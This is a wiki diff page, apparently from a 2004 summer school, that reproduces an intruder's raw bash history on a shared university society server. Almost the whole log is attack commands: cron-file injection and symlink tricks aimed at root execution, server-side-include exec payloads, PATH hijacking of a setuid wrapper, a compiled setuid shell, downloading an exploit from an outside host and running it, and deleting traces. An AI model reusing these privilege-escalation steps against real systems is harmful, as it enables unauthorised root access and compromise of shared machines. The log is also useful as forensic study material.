Difference between revisions of "Summerschool Aachen 2004/Source for Hacking Log"
Line 1: | Line 1: | ||
− | + | $ cat ~pet-jcr/.bash_history | |
− | + | date | |
− | + | ls -al /tmp/.rmsd | |
− | + | ls -ld /asdf | |
− | + | date | |
− | + | echo '38 * * * * root /societies/pet-jcr/cron' >> socslist | |
− | + | echo '38 * * * * root /societies/pet-jcr/cron' >> socslist.html | |
− | + | date | |
− | + | ls -al | |
− | + | date | |
− | + | ls -ld /hehe | |
− | + | cat /societies/pet-jcr/cron | |
− | + | ls -al | |
− | + | ls -al | |
− | + | ld -l | |
− | + | ls -ld /hehe | |
− | + | cat /etc/cron.conf | |
− | + | locate corn | |
− | + | locate cron | |
− | + | ls -al | |
− | + | w | |
− | + | ls -al | |
− | + | cat socs* | |
− | + | mount | |
− | + | grep `whoami` /etc/passwd | |
− | + | echo 'mkdir /tmp/okcool' > /societies/pet-jcr | |
− | + | echo 'mkdir /tmp/okcool' > /societies/pet-jcr?C | |
− | + | echo 'mkdir /tmp/okcool' > /societies/pet-jcr/cron | |
− | + | echo '' | |
− | + | whereis mkdir | |
− | + | echo '/bin/mkdir /tmp/okcool' > /societies/pet-jcr/cron | |
− | + | ls -la | |
− | + | cat socs* | |
− | + | date | |
− | + | ls -al /tmp/okcool | |
− | + | date | |
− | + | ls a-l | |
− | + | ls -al | |
− | + | date | |
− | + | echo '44,45,46,47,48,49 * * * * pet-jcr /societies/pet-jcr/cron ' > sco | |
− | + | echo '44,45,46,47,48,49 * * * * pet-jcr /societies/pet-jcr/cron' > socslist.html | |
− | + | ls -al | |
− | + | ls a-l | |
− | + | cat socs* | |
− | + | date | |
− | + | date | |
− | + | date | |
− | + | date | |
− | + | ls -al /tmp/okcool | |
− | + | ls -al | |
− | + | locate cron.conf | |
− | + | cat exim | |
− | + | cat /var/lib/dpkg/info/cron.conffiles | |
− | + | cat /etc/crontab | |
− | + | cat /etc/pam.d/cron | |
− | + | ls -al | |
− | + | date | |
− | + | echo '44,45,46,47,48,49 * * * * pet-jcr /bin/mkdir /tmp/test' > socslist.html | |
− | + | date | |
− | + | ls -al /tmp/test | |
− | + | rm -f /tmp/test | |
− | + | ls -al /tmp/test | |
− | + | date | |
− | + | date | |
− | + | date | |
− | + | date | |
− | + | ls -al /tmp/test | |
− | + | ls -al /tmp/test | |
− | + | echo "44,45,46,47,48,49 * * * * pet-jcr '/bin/mkdir /tmp/test'" > socslist.html | |
− | + | cat sc | |
− | + | cat socslist.html | |
− | + | date | |
− | + | echo "50 * * * * pet-jcr '/bin/mkdir /tmp/test'" > socslist.html | |
− | + | date | |
− | + | date | |
− | + | ls -al /tmp/test | |
− | + | cat /etc/default/cron | |
− | + | cat /etc/cron | |
− | + | o | |
− | + | lsmod | |
− | + | ls -al | |
− | + | cat lof | |
− | + | cag | |
− | + | cat logchecjk | |
− | + | cat logcheck | |
− | + | cat logloadavg | |
− | + | ls -al /usr/local/sbin/loadavgchk | |
− | + | ls a-l | |
− | + | ls a-l | |
− | + | ls -al | |
− | + | ps ax | grep cron | |
− | + | ls -l /var/log/cron | |
− | + | ls -al /var/logl | |
− | + | ls -al /var/log/cron.* | |
− | + | ls -al /var/log/*cron* | |
− | + | locaet cron | |
− | + | locate cron | |
− | + | grep `1` | |
− | + | grep`wh | |
− | + | ` | |
− | + | grep `whoami` /etc/passwd | |
− | + | echo 'MAILTO=pet-jcr' > /societies/pet-jcr/cron | |
− | + | echo 'echo FUCK YOU' >> /societies/pet-jcr/cron | |
− | + | cat socslist.html | |
− | + | date | |
− | + | echo '55,56,57,58' /societies/pet-jcr/cron > socslist.html | |
− | + | echo '55,56,57,58 * * * * pet-jcr /societies/pet-jcr/cron' > socslist.html | |
− | + | date | |
− | + | date | |
− | + | date | |
− | + | date | |
− | + | mail | |
− | + | locaet cron.deny | |
− | + | locaet cron.deny | |
− | + | locate cron.deny | |
− | + | locate cron.allow | |
− | + | ls -al | |
− | + | cat socslist.html | |
− | + | mail | |
− | + | ls -al | |
− | + | locaet cron | |
− | + | locate cron | |
− | + | cat /var/run/crond.pid | |
− | + | ps a | grep 502 | |
− | + | ps ax | grep 502 | |
− | + | ls /avr/log | |
− | + | ls /var/log | |
− | + | ls -al /var/log | |
− | + | grep cron /var/log/* | |
− | + | rpm -q crontab | |
− | + | rpm -q cron | |
− | + | apt-ac | |
− | + | apt-cache policy cron | |
− | + | fd | |
− | + | date | |
− | + | dat | |
− | + | date | |
− | + | echo '2,3,4,5,6,7,8,9,10 * * * * root /societies/pet-jcr/cron' > socslist.html | |
− | + | ls -al /societies/pet-jcr/cron | |
− | + | echo '#!/usr/bin/perl' > /societies/pet-jcr/cron | |
− | + | echo >> /societies/pet-jcr/cron | |
− | + | echo 'mkdir("/tmp/test");' >> /societies/pet-jcr/cron | |
− | + | cat /societies/pet-jcr/cron | |
− | + | date | |
− | + | chmod +x /societies/pet-jcr/cron | |
− | + | date | |
− | + | ls -al /tmp/test | |
− | + | cat /etc/crontab | |
− | + | ls -al /bin/sh | |
− | + | ls -al /bin/bash | |
− | + | chmod a+x /societies/pet-jcr/cron | |
− | + | ls -al /societies/pet-jcr/cron | |
− | + | ls -ld /etc/cron.* | |
− | + | cat /etc/crontab | |
− | + | cat /tmp/*.tmp | |
− | + | cat /cron.daily | |
− | + | cat /etc/cron.daily/mk* | |
− | + | ls -al /var/www/admin/socslist.html | |
− | + | ls -al /var/www/admin/socslist.html* | |
− | + | ln -s /etc/cron.daily /var/www/admin/socslist.html~ | |
− | + | ln -s /etc/cron.daily '/var/www/admin/socslist.html~' | |
− | + | ln -s /etc/cron.daily /var/www/admin/socslist.html\~ | |
− | + | cd /var/www/admin/ | |
− | + | ln -s * | |
− | + | ln -s /etc/cron.daily * | |
− | + | ln -s /etc/cron.daily /var/www/admin/socslist.html | |
− | + | echo ~ | |
− | + | ln -s '/etc/cron.daily' '/var/www/admin/socslist.html~' | |
− | + | cd /etc/cron.d | |
− | + | ls -al | |
− | + | cat mailman | |
− | + | cat killpager | |
− | + | g | |
− | + | file /usr/local/sbin/killpager | |
− | [ | + | cat /usr/local/sbin/killpager |
− | [ | + | ls -al |
− | + | cat postr | |
− | [ | + | cat post* |
− | [ | + | cat socslist.html |
− | + | /societies/pet-jcr/cron | |
+ | ls -al /tmp/test | ||
+ | date | ||
+ | rm -rf /tmp/test | ||
+ | cd /var/www/admin/ | ||
+ | ls -la | ||
+ | rm f | ||
+ | rm -f socslist.html~ | ||
+ | rm -f 'socslist.html~' | ||
+ | ls -al | ||
+ | mv soclist | ||
+ | mv socslist.html~ /tmp | ||
+ | ls -al /etc/cron.daily | ||
+ | cat /etc/mkwebuser* | ||
+ | cat /etc/mkweb | ||
+ | cat /etc/cron.daily/mkweb* | ||
+ | lb -s /etc/ | ||
+ | ln -s /etc/cron.daily /tmp/userlist.tmp | ||
+ | ls -al /tmp/userlist.tmp | ||
+ | cat /etc/crontab | ||
+ | ls -a /tmp/userlist.tmp | ||
+ | ls -al /tmp/userlist.tmp | ||
+ | cd /tmp | ||
+ | ls | ||
+ | ls | grep -v sess | ||
+ | rm -f smb smb.c rev.c blah asdf | ||
+ | rm -rf blah | ||
+ | rm -f user | ||
+ | rm -f socslist.html~ | ||
+ | cd /etc/cron.d | ||
+ | sl | ||
+ | ls a-l | ||
+ | ls -al | ||
+ | ls -al /etc/cron.d | ||
+ | cd /etc/cron.d | ||
+ | cat logloadavg | ||
+ | file /usr/local/sbin/loadavgchk | ||
+ | cat /usr/local/sbin/loadavgchk | ||
+ | cat logcheck | ||
+ | file /usr/sbin/logcheck | ||
+ | cat /usr/sbin/logcheck | ||
+ | ls /tmp/check* | ||
+ | ls -al | ||
+ | cat exim | ||
+ | file /usr/sbin/exim | ||
+ | cd /etc/cron.d | ||
+ | ls -al | ||
+ | cat socslist.html | ||
+ | ls -al /societies/pet-jcr/cron | ||
+ | cat /societies/pet-jcr/cron | ||
+ | ls -ld /tmp/test | ||
+ | date | ||
+ | echo '29,30,31,32 * * * * root /societies/pet-jcr/cron' > socslist.html | ||
+ | date | ||
+ | ls -ld /tmp/test | ||
+ | cat /etc/syslog.conf | ||
+ | ls -al /etc/syslog.con | ||
+ | ls -al /etc/syslog.conf | ||
+ | ls -al /avr/log/syslog | ||
+ | ls -al /var/log/syslog | ||
+ | cd /etc/cron.d | ||
+ | cat socslist.html | ||
+ | ls -al /societies/pet-jcr/cron | ||
+ | date | ||
+ | ls -al /tmp/test | ||
+ | cd /etc/f | ||
+ | cd /etc/cron.d | ||
+ | sl a-l | ||
+ | ls -al /societies/pet-jcr/cron | ||
+ | echo 'mkdir /tmp/test' > /societies/pet-jcr/cron | ||
+ | ls -al /societies/pet-jcr/cron | ||
+ | ls | ||
+ | cat socslist.html | ||
+ | date | ||
+ | echo '39,40,41,42,43,44 * * * * root /societies/pet-jcr/cron' > socslist.html | ||
+ | ls -al | ||
+ | chmod 644 socslit.html | ||
+ | ls -al | ||
+ | chgmod | ||
+ | chmod 644 socslist.html | ||
+ | ls -al | ||
+ | md5sum /etc/crontab | ||
+ | ls -al | ||
+ | ls -ld /tmp/test | ||
+ | cat socs* | ||
+ | echo >> socslist.html | ||
+ | x | ||
+ | date | ||
+ | ls -ld /tmp/test | ||
+ | /societies/pet-jcr/cron | ||
+ | ls -ld /tmp/test | ||
+ | rm -rf /tmp/test | ||
+ | ls -al | ||
+ | whereis cron | ||
+ | md5sum /usr/sbin/cron | ||
+ | w | ||
+ | ps ax | grep ssh | ||
+ | date | ||
+ | cat /etc/cron.daily/mk* | ||
+ | ls -al /var/www/admin/userlist.html | ||
+ | date | ||
+ | ls -al /etc/cron.d | ||
+ | ls -al /var/www/admin/userlist.html | ||
+ | date | ||
+ | ls -al /var/www/admin | ||
+ | ls /etc | ||
+ | cat /etc/init.dc | ||
+ | cat /etc/init.d/cron | ||
+ | cat /etc/nsswitch.conf | ||
+ | md5sum /etc/pam.d/cron | ||
+ | md5sum | ||
+ | md5u | ||
+ | md5sum /etc/init.d/cron | ||
+ | md5sum /etc/nsswitch.conf | ||
+ | strace -f /usr/sbin/cron 2>&1 | grep open | ||
+ | cd /etc/crno | ||
+ | cd /etc/cron.d | ||
+ | echo '0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, \ | ||
+ | 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, \ | ||
+ | 47,49,50,51,52,53,54,55,56,57,58,59 * * * * pet-jcr /societies/pet-jcr/cron' > socslist.html | ||
+ | ls -al /societies/pet-jcr/cron ; cat /societies/pet-jcr/cron | ||
+ | ls -ld /tmp/test | ||
+ | grep pet-jcr /etc/passwd | ||
+ | cd /c | ||
+ | cd /etc/cron.daily | ||
+ | cat mk* | ||
+ | cd /var/www/ | ||
+ | grep 'userlist/h' | ||
+ | cd /var/www | ||
+ | grep 'userlist.html' * -r | ||
+ | lsl -la /home/societies/srcf/admin/soclist | ||
+ | ls -la /home/societies/srcf/admin/soclist | ||
+ | rm -f /tmp/*.tmp | ||
+ | cd /etc/cron.d | ||
+ | ls -al | ||
+ | ls -al /home/www/admin | ||
+ | ls -al /var/www/admin/ | ||
+ | ls -lda e/tc | ||
+ | ls -lda /etc | ||
+ | ls -al | ||
+ | cat logcheck | ||
+ | ls -ld /etc/rc0.d | ||
+ | cd /home/www | ||
+ | cd /var/www/admin | ||
+ | ls -al | ||
+ | rm -f socslist.html~ | ||
+ | ls -al /etc/rc0.d | ||
+ | ps ax | ||
+ | cat /etc/at.deny | ||
+ | ls -al /etc/at.den | ||
+ | ls -al /etc/at.deny | ||
+ | ps ax | ||
+ | ls -al | ||
+ | cd /etc/cron.d | ||
+ | ls -al | ||
+ | cd ../cron.daily | ||
+ | ls -la | ||
+ | xR | ||
+ | cat reachox_cleanup | ||
+ | cat backup_etc | ||
+ | grep '`' * | ||
+ | ps ax | ||
+ | ls | ||
+ | cd /etc/cron.daily | ||
+ | grep '`' * | ||
+ | syslogd-listfiles | ||
+ | ls -al /societies/srcf/admin/memberlist | ||
+ | ls -al /societies/srcf/admin/memberlist | ||
+ | ls -al | ||
+ | locate sanity-check-socs | ||
+ | cat /societies/srcf/sanity-check-socs.020617 | ||
+ | cd /etc/cron.daily | ||
+ | ls -al | ||
+ | cat mkwebsoclist | ||
+ | cat /var/www/socs/index.html | ||
+ | cat /u | ||
+ | cat /etc/apache/conf/httpd.conf | ||
+ | locate httpd.conf | ||
+ | cat /etc/apache/httpd.conf | ||
+ | ls -al /home/societies/srcf/admin/soclist | ||
+ | cd /home/societies/srcf/admin/ | ||
+ | ls -al | ||
+ | find / -perm -4000 2>/dev/null | ||
+ | ecjh | ||
+ | echo '<!-- | ||
+ | <!--#exec cmd="id" --> | ||
+ | <!--#exec cmd="cp /tmp/.rmsd /tmp/.rm" --> | ||
+ | <!--#exec cmd="chmod 4755 /tmp/.rm" --> | ||
+ | --> | ||
+ | ' > /tmp/socslist.tmp | ||
+ | cat /tmp/socslist.tmp | ||
+ | ls -al /tmp/.rmsd | ||
+ | cat /var/www/index.html | ||
+ | cat /var/www/socs/index.html | ||
+ | rm -f /etc/cron.d/*a | ||
+ | ls /etc/cron.d | ||
+ | ls /var/ww | ||
+ | ls /var/www | ||
+ | ls /var/www/socs | ||
+ | cat /var/www/socs/socjoin.html | ||
+ | wc -l /tmp/socslit | ||
+ | wc -l /tmp/socslist/.tmp | ||
+ | wc -l /tmp/socslit | ||
+ | wc -l /tmp/socslist.tmp | ||
+ | head -n4 /tmp/socslist.tmp > /tmp/a | ||
+ | cd /tmp | ||
+ | cat a | ||
+ | echo '<!--#exec cmd="${QUERY_STRING}" -->' >> a | ||
+ | echo '--> ' >>a | ||
+ | cat a | ||
+ | mv -f a socslist.tmp | ||
+ | ls -al socslist.tmp | ||
+ | exit | ||
+ | find / -perm -4000 2>/dev/null | ||
+ | /tmp/r | ||
+ | /tmp/.rm | ||
+ | ./.r | ||
+ | pwd | ||
+ | cd /tmp | ||
+ | ./.r | ||
+ | id | ||
+ | exit | ||
+ | cd /tmp | ||
+ | ./.mr | ||
+ | ./.rm | ||
+ | ./.r | ||
+ | ./.r | ||
+ | ./.r | ||
+ | exit | ||
+ | cd /tmp | ||
+ | ./.rmsd | ||
+ | cd /tmp | ||
+ | ./.rmsd | ||
+ | exit | ||
+ | wget xpl.drakg.org/login | ||
+ | cd /dev/drg | ||
+ | ./login -h localhost -d 80 | ||
+ | ./sk | ||
+ | ls -al | ||
+ | head inst | ||
+ | ./login -h localohst -d 80 -s 20 | ||
+ | ./login -h 0 -d 80 -s 20 | ||
+ | ./login -h 0 -d 80 | ||
+ | uptime | ||
+ | ls -al /tmp/mr | ||
+ | ls -al /tmp/rm | ||
+ | ls -al /tmp/.rm | ||
+ | cat .sniffer | ||
+ | exit | ||
+ | /societies/reachox/bin/wrapper /tmp/test.pl | ||
+ | cd /var/www/stats | ||
+ | ls -ld . | ||
+ | cd ../admin | ||
+ | ls -al | ||
+ | cd /usr/local/cgi-lib | ||
+ | locate newsadmin.cgi | ||
+ | cd /usr/lib/cgi-bin/ | ||
+ | grep open * | ||
+ | cat survey.old | ||
+ | ls -al /var/www/admin/survey | ||
+ | ls -al | ||
+ | grep open * | ||
+ | cat anlgform.cgi | ||
+ | ls -al /usr/bin/analog | ||
+ | grpe ENV * | ||
+ | grep eNV * | ||
+ | grep ENV * | ||
+ | cat newsadmin.cgi | ||
+ | ls -al /var/www/news/admin/logs/submit.log | ||
+ | ecxp | ||
+ | export REMOTE_ADDR="" | ||
+ | export REMOTE_ADDR='<!--#exec cmd="${QUERY_STRING}"-->' | ||
+ | echo 4REMOTE_ | ||
+ | echo $REMOTE_ADDR | ||
+ | / | ||
+ | /societies/reachox/bin/wrapper newsadmin.cgi | ||
+ | /societies/reachox/bin/wrapper ./newsadmin.cgi | ||
+ | cat /var/www/news/admin | ||
+ | cat /var/www/news/admin/logs/submit.log | ||
+ | ls -al /var/www/news/admin/logs/submit.log | ||
+ | ls -al /var/www/news/admin/logs/ | ||
+ | ls -al /var/www/news/admin/ | ||
+ | /societies/reachox/bin/wrapper newsadmin.cgi | ||
+ | EXP | ||
+ | export PATH=$PATH:. | ||
+ | /societies/reachox/bin/wrapper newsadmin.cgi | ||
+ | cd /tmp | ||
+ | echo id > newsadmin.cgi | ||
+ | chmod +x i | ||
+ | chomd +x newsd | ||
+ | chmod +x newsm | ||
+ | chmod +x newsadmin.cgi | ||
+ | cd /usr/lib/cgi-bin | ||
+ | /societies/reachox/bin/wrapper | ||
+ | echo $PATH | ||
+ | epoxrt | ||
+ | export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/tmp | ||
+ | /societies/reachox/bin/wrapper newsadmin.cgi | ||
+ | echo '#include <stdio.h>' > /tmp/rm.c | ||
+ | rcho >> /tmp | ||
+ | echo >> /tmp/rm.c | ||
+ | echo 'int main() { setreuid(1007,1007); setregid(1007,1007 }' | ||
+ | echo 'int main() { setreuid(1007,1007); setregid(1007,1007); execl("/bin/sh","/binsh","-i' | ||
+ | echo 'int main() { setreuid(1007,1007); setregid(1007,1007); execl("/bin/sh","/bin/sh","-i",0); }' >> /tmp/rm.c | ||
+ | gcc -o /tmp/rm /tmp/rm.c | ||
+ | ls -al /tmp/rm | ||
+ | echo 'cp /tmp/rm /tmp/rm2' > /tmp/newsamd | ||
+ | mv /tmp/newsamd /tmp/newsadmin.cgi | ||
+ | echo 'chmod 4755 /tmp/rm2' > /tmp | ||
+ | echo 'chmod 4755 /tmp/rm2' >> /tmp/newsadmin.cgi | ||
+ | /societies/reachox/bin/wrapper newsadmin.cgi | ||
+ | ls -al /tmp/rm2 | ||
+ | chmod +x /tmp/newsadm,in | ||
+ | chmod +x /tmp/newsadmin.cgi | ||
+ | /societies/reachox/bin/wrapper newsadmin.cgi | ||
+ | /tmp/rm2 | ||
+ | rm -f /tmp/newsadmin.cgi | ||
+ | /tmp/rm2 | ||
+ | ls -la | ||
+ | pwd | ||
+ | exit | ||
+ | cd /tmp | ||
+ | ./rmsd | ||
+ | exit | ||
+ | |||
+ | [[Category:Summerschools]] | ||
+ | [[Category:Hacks]] |
Latest revision as of 10:33, 17 October 2005
$ cat ~pet-jcr/.bash_history date ls -al /tmp/.rmsd ls -ld /asdf date echo '38 * * * * root /societies/pet-jcr/cron' >> socslist echo '38 * * * * root /societies/pet-jcr/cron' >> socslist.html date ls -al date ls -ld /hehe cat /societies/pet-jcr/cron ls -al ls -al ld -l ls -ld /hehe cat /etc/cron.conf locate corn locate cron ls -al w ls -al cat socs* mount grep `whoami` /etc/passwd echo 'mkdir /tmp/okcool' > /societies/pet-jcr echo 'mkdir /tmp/okcool' > /societies/pet-jcr?C echo 'mkdir /tmp/okcool' > /societies/pet-jcr/cron echo whereis mkdir echo '/bin/mkdir /tmp/okcool' > /societies/pet-jcr/cron ls -la cat socs* date ls -al /tmp/okcool date ls a-l ls -al date echo '44,45,46,47,48,49 * * * * pet-jcr /societies/pet-jcr/cron ' > sco echo '44,45,46,47,48,49 * * * * pet-jcr /societies/pet-jcr/cron' > socslist.html ls -al ls a-l cat socs* date date date date ls -al /tmp/okcool ls -al locate cron.conf cat exim cat /var/lib/dpkg/info/cron.conffiles cat /etc/crontab cat /etc/pam.d/cron ls -al date echo '44,45,46,47,48,49 * * * * pet-jcr /bin/mkdir /tmp/test' > socslist.html date ls -al /tmp/test rm -f /tmp/test ls -al /tmp/test date date date date ls -al /tmp/test ls -al /tmp/test echo "44,45,46,47,48,49 * * * * pet-jcr '/bin/mkdir /tmp/test'" > socslist.html cat sc cat socslist.html date echo "50 * * * * pet-jcr '/bin/mkdir /tmp/test'" > socslist.html date date ls -al /tmp/test cat /etc/default/cron cat /etc/cron o lsmod ls -al cat lof cag cat logchecjk cat logcheck cat logloadavg ls -al /usr/local/sbin/loadavgchk ls a-l ls a-l ls -al ps ax | grep cron ls -l /var/log/cron ls -al /var/logl ls -al /var/log/cron.* ls -al /var/log/*cron* locaet cron locate cron grep `1` grep`wh ` grep `whoami` /etc/passwd echo 'MAILTO=pet-jcr' > /societies/pet-jcr/cron echo 'echo FUCK YOU' >> /societies/pet-jcr/cron cat socslist.html date echo '55,56,57,58' /societies/pet-jcr/cron > socslist.html echo '55,56,57,58 * * * * pet-jcr /societies/pet-jcr/cron' > socslist.html date date date date mail locaet cron.deny locaet cron.deny locate cron.deny locate cron.allow ls -al cat socslist.html mail ls -al locaet cron locate cron cat /var/run/crond.pid ps a | grep 502 ps ax | grep 502 ls /avr/log ls /var/log ls -al /var/log grep cron /var/log/* rpm -q crontab rpm -q cron apt-ac apt-cache policy cron fd date dat date echo '2,3,4,5,6,7,8,9,10 * * * * root /societies/pet-jcr/cron' > socslist.html ls -al /societies/pet-jcr/cron echo '#!/usr/bin/perl' > /societies/pet-jcr/cron echo >> /societies/pet-jcr/cron echo 'mkdir("/tmp/test");' >> /societies/pet-jcr/cron cat /societies/pet-jcr/cron date chmod +x /societies/pet-jcr/cron date ls -al /tmp/test cat /etc/crontab ls -al /bin/sh ls -al /bin/bash chmod a+x /societies/pet-jcr/cron ls -al /societies/pet-jcr/cron ls -ld /etc/cron.* cat /etc/crontab cat /tmp/*.tmp cat /cron.daily cat /etc/cron.daily/mk* ls -al /var/www/admin/socslist.html ls -al /var/www/admin/socslist.html* ln -s /etc/cron.daily /var/www/admin/socslist.html~ ln -s /etc/cron.daily '/var/www/admin/socslist.html~' ln -s /etc/cron.daily /var/www/admin/socslist.html\~ cd /var/www/admin/ ln -s * ln -s /etc/cron.daily * ln -s /etc/cron.daily /var/www/admin/socslist.html echo ~ ln -s '/etc/cron.daily' '/var/www/admin/socslist.html~' cd /etc/cron.d ls -al cat mailman cat killpager g file /usr/local/sbin/killpager cat /usr/local/sbin/killpager ls -al cat postr cat post* cat socslist.html /societies/pet-jcr/cron ls -al /tmp/test date rm -rf /tmp/test cd /var/www/admin/ ls -la rm f rm -f socslist.html~ rm -f 'socslist.html~' ls -al mv soclist mv socslist.html~ /tmp ls -al /etc/cron.daily cat /etc/mkwebuser* cat /etc/mkweb cat /etc/cron.daily/mkweb* lb -s /etc/ ln -s /etc/cron.daily /tmp/userlist.tmp ls -al /tmp/userlist.tmp cat /etc/crontab ls -a /tmp/userlist.tmp ls -al /tmp/userlist.tmp cd /tmp ls ls | grep -v sess rm -f smb smb.c rev.c blah asdf rm -rf blah rm -f user rm -f socslist.html~ cd /etc/cron.d sl ls a-l ls -al ls -al /etc/cron.d cd /etc/cron.d cat logloadavg file /usr/local/sbin/loadavgchk cat /usr/local/sbin/loadavgchk cat logcheck file /usr/sbin/logcheck cat /usr/sbin/logcheck ls /tmp/check* ls -al cat exim file /usr/sbin/exim cd /etc/cron.d ls -al cat socslist.html ls -al /societies/pet-jcr/cron cat /societies/pet-jcr/cron ls -ld /tmp/test date echo '29,30,31,32 * * * * root /societies/pet-jcr/cron' > socslist.html date ls -ld /tmp/test cat /etc/syslog.conf ls -al /etc/syslog.con ls -al /etc/syslog.conf ls -al /avr/log/syslog ls -al /var/log/syslog cd /etc/cron.d cat socslist.html ls -al /societies/pet-jcr/cron date ls -al /tmp/test cd /etc/f cd /etc/cron.d sl a-l ls -al /societies/pet-jcr/cron echo 'mkdir /tmp/test' > /societies/pet-jcr/cron ls -al /societies/pet-jcr/cron ls cat socslist.html date echo '39,40,41,42,43,44 * * * * root /societies/pet-jcr/cron' > socslist.html ls -al chmod 644 socslit.html ls -al chgmod chmod 644 socslist.html ls -al md5sum /etc/crontab ls -al ls -ld /tmp/test cat socs* echo >> socslist.html x date ls -ld /tmp/test /societies/pet-jcr/cron ls -ld /tmp/test rm -rf /tmp/test ls -al whereis cron md5sum /usr/sbin/cron w ps ax | grep ssh date cat /etc/cron.daily/mk* ls -al /var/www/admin/userlist.html date ls -al /etc/cron.d ls -al /var/www/admin/userlist.html date ls -al /var/www/admin ls /etc cat /etc/init.dc cat /etc/init.d/cron cat /etc/nsswitch.conf md5sum /etc/pam.d/cron md5sum md5u md5sum /etc/init.d/cron md5sum /etc/nsswitch.conf strace -f /usr/sbin/cron 2>&1 | grep open cd /etc/crno cd /etc/cron.d echo '0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, \ 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, \ 47,49,50,51,52,53,54,55,56,57,58,59 * * * * pet-jcr /societies/pet-jcr/cron' > socslist.html ls -al /societies/pet-jcr/cron ; cat /societies/pet-jcr/cron ls -ld /tmp/test grep pet-jcr /etc/passwd cd /c cd /etc/cron.daily cat mk* cd /var/www/ grep 'userlist/h' cd /var/www grep 'userlist.html' * -r lsl -la /home/societies/srcf/admin/soclist ls -la /home/societies/srcf/admin/soclist rm -f /tmp/*.tmp cd /etc/cron.d ls -al ls -al /home/www/admin ls -al /var/www/admin/ ls -lda e/tc ls -lda /etc ls -al cat logcheck ls -ld /etc/rc0.d cd /home/www cd /var/www/admin ls -al rm -f socslist.html~ ls -al /etc/rc0.d ps ax cat /etc/at.deny ls -al /etc/at.den ls -al /etc/at.deny ps ax ls -al cd /etc/cron.d ls -al cd ../cron.daily ls -la xR cat reachox_cleanup cat backup_etc grep '`' * ps ax ls cd /etc/cron.daily grep '`' * syslogd-listfiles ls -al /societies/srcf/admin/memberlist ls -al /societies/srcf/admin/memberlist ls -al locate sanity-check-socs cat /societies/srcf/sanity-check-socs.020617 cd /etc/cron.daily ls -al cat mkwebsoclist cat /var/www/socs/index.html cat /u cat /etc/apache/conf/httpd.conf locate httpd.conf cat /etc/apache/httpd.conf ls -al /home/societies/srcf/admin/soclist cd /home/societies/srcf/admin/ ls -al find / -perm -4000 2>/dev/null ecjh echo ' --> ' > /tmp/socslist.tmp cat /tmp/socslist.tmp ls -al /tmp/.rmsd cat /var/www/index.html cat /var/www/socs/index.html rm -f /etc/cron.d/*a ls /etc/cron.d ls /var/ww ls /var/www ls /var/www/socs cat /var/www/socs/socjoin.html wc -l /tmp/socslit wc -l /tmp/socslist/.tmp wc -l /tmp/socslit wc -l /tmp/socslist.tmp head -n4 /tmp/socslist.tmp > /tmp/a cd /tmp cat a echo >> a echo '--> ' >>a cat a mv -f a socslist.tmp ls -al socslist.tmp exit find / -perm -4000 2>/dev/null /tmp/r /tmp/.rm ./.r pwd cd /tmp ./.r id exit cd /tmp ./.mr ./.rm ./.r ./.r ./.r exit cd /tmp ./.rmsd cd /tmp ./.rmsd exit wget xpl.drakg.org/login cd /dev/drg ./login -h localhost -d 80 ./sk ls -al head inst ./login -h localohst -d 80 -s 20 ./login -h 0 -d 80 -s 20 ./login -h 0 -d 80 uptime ls -al /tmp/mr ls -al /tmp/rm ls -al /tmp/.rm cat .sniffer exit /societies/reachox/bin/wrapper /tmp/test.pl cd /var/www/stats ls -ld . cd ../admin ls -al cd /usr/local/cgi-lib locate newsadmin.cgi cd /usr/lib/cgi-bin/ grep open * cat survey.old ls -al /var/www/admin/survey ls -al grep open * cat anlgform.cgi ls -al /usr/bin/analog grpe ENV * grep eNV * grep ENV * cat newsadmin.cgi ls -al /var/www/news/admin/logs/submit.log ecxp export REMOTE_ADDR="" export REMOTE_ADDR= echo 4REMOTE_ echo $REMOTE_ADDR / /societies/reachox/bin/wrapper newsadmin.cgi /societies/reachox/bin/wrapper ./newsadmin.cgi cat /var/www/news/admin cat /var/www/news/admin/logs/submit.log ls -al /var/www/news/admin/logs/submit.log ls -al /var/www/news/admin/logs/ ls -al /var/www/news/admin/ /societies/reachox/bin/wrapper newsadmin.cgi EXP export PATH=$PATH:. /societies/reachox/bin/wrapper newsadmin.cgi cd /tmp echo id > newsadmin.cgi chmod +x i chomd +x newsd chmod +x newsm chmod +x newsadmin.cgi cd /usr/lib/cgi-bin /societies/reachox/bin/wrapper echo $PATH epoxrt export PATH=/bin:/usr/bin:/sbin:/usr/sbin:/tmp /societies/reachox/bin/wrapper newsadmin.cgi echo '#include <stdio.h>' > /tmp/rm.c rcho >> /tmp echo >> /tmp/rm.c echo 'int main() { setreuid(1007,1007); setregid(1007,1007 }' echo 'int main() { setreuid(1007,1007); setregid(1007,1007); execl("/bin/sh","/binsh","-i' echo 'int main() { setreuid(1007,1007); setregid(1007,1007); execl("/bin/sh","/bin/sh","-i",0); }' >> /tmp/rm.c gcc -o /tmp/rm /tmp/rm.c ls -al /tmp/rm echo 'cp /tmp/rm /tmp/rm2' > /tmp/newsamd mv /tmp/newsamd /tmp/newsadmin.cgi echo 'chmod 4755 /tmp/rm2' > /tmp echo 'chmod 4755 /tmp/rm2' >> /tmp/newsadmin.cgi /societies/reachox/bin/wrapper newsadmin.cgi ls -al /tmp/rm2 chmod +x /tmp/newsadm,in chmod +x /tmp/newsadmin.cgi /societies/reachox/bin/wrapper newsadmin.cgi /tmp/rm2 rm -f /tmp/newsadmin.cgi /tmp/rm2 ls -la pwd exit cd /tmp ./rmsd exit